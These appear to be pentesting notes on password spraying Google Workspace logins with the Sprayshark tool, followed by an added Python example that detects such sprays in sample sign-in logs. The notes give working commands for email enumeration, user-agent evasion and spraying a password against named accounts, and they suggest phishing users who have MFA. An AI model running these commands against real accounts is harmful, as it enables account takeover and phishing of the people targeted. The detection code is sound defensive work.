Password Spraying

Sprayshark

  • Password sprayer for G Suite
    • Creates a headless Chrome session against accounts.google.com, enters the email, and parses the returned page text to check whether the email exists
    • Enters passwords if the email exists and classifies whether user:pass is valid based on the DOM (wrong password, MFA screen, or login)

Increasing probability of success

  • Using AWS IAM instead of federation is generally weak
    • Azure and GCP are stronger against password spraying
  • E.g., when using Sprayshark, the user agent can be caught by Google.
  • Change the user agent and start the attack:
    • sprayshark enum -U emails.txt --timeout 360 --chrome-user-agent "Mozilla/5.0 (windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36"
  • Sprayshark also captures screenshots when running user enum

ID Valid Emails

  • rm ~/.sprayshark.db;
  • sprayshark enum -U emails.txt
    • If there is a timeout, Google is blocking us

Password Spraying

  • sprayshark spray -u janes@shopgigantic.com -p 'W3lc0m3!'

Identifying MFA

  • sprayshark spray -u rohita@shopgigantic.com -P passwords.txt --timeout 360 --chrome-user-agent "Mozilla/5.0 (windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36"
    • It will return [CREDENTIALS found with MFA]
  • we can try phishing these users
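
On the defender side, the outcomes listed above (wrong password, MFA screen, login) show up in sign-in logs as one source failing against many accounts, sometimes followed by an accepted password. The sketch below is an added example, not part of these notes or of Sprayshark; the event fields, result labels, thresholds and sample events are assumptions constructed for illustration.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample events: (time, source IP, account, result). The field layout
# and result labels are assumptions for this example, not a real log schema.
EVENTS = [
    ("2026-03-04T15:30:00", "203.0.113.7", "alice@example.com", "bad_password"),
    ("2026-03-04T15:32:10", "203.0.113.7", "bob@example.com", "bad_password"),
    ("2026-03-04T15:34:25", "203.0.113.7", "carol@example.com", "bad_password"),
    ("2026-03-04T15:36:40", "203.0.113.7", "dave@example.com", "bad_password"),
    ("2026-03-04T15:38:55", "203.0.113.7", "erin@example.com", "mfa_challenge"),
    ("2026-03-04T15:41:05", "203.0.113.7", "frank@example.com", "success"),
    # An ordinary user mistyping a password: one account, must not be flagged.
    ("2026-03-04T15:33:00", "198.51.100.20", "bob@example.com", "bad_password"),
    ("2026-03-04T15:33:20", "198.51.100.20", "bob@example.com", "bad_password"),
    ("2026-03-04T15:33:45", "198.51.100.20", "bob@example.com", "success"),
]

def detect_spray(events, window=timedelta(minutes=30), min_users=4):
    """Return {source: finding} for sources that fail logins against at least
    min_users distinct accounts inside one sliding time window."""
    by_src = defaultdict(list)
    for ts, src, user, result in events:
        by_src[src].append((datetime.fromisoformat(ts), user, result))
    findings = {}
    for src, rows in by_src.items():
        rows.sort()
        start, sprayed = 0, False
        for end in range(len(rows)):
            while rows[end][0] - rows[start][0] > window:
                start += 1
            failed = {u for _, u, r in rows[start:end + 1] if r == "bad_password"}
            if len(failed) >= min_users:
                sprayed = True
                break
        if sprayed:
            findings[src] = {
                "targeted": sorted({u for _, u, _ in rows}),
                # Password accepted: reset these accounts even if MFA stopped the login.
                "password_known": sorted({u for _, u, r in rows
                                          if r in ("mfa_challenge", "success")}),
                "logged_in": sorted({u for _, u, r in rows if r == "success"}),
            }
    return findings

if __name__ == "__main__":
    for src, finding in detect_spray(EVENTS).items():
        print(src, finding)
```

Accounts under "password_known" but not "logged_in" correspond to the "CREDENTIALS found with MFA" case: the password is compromised and should be rotated even though the second factor held.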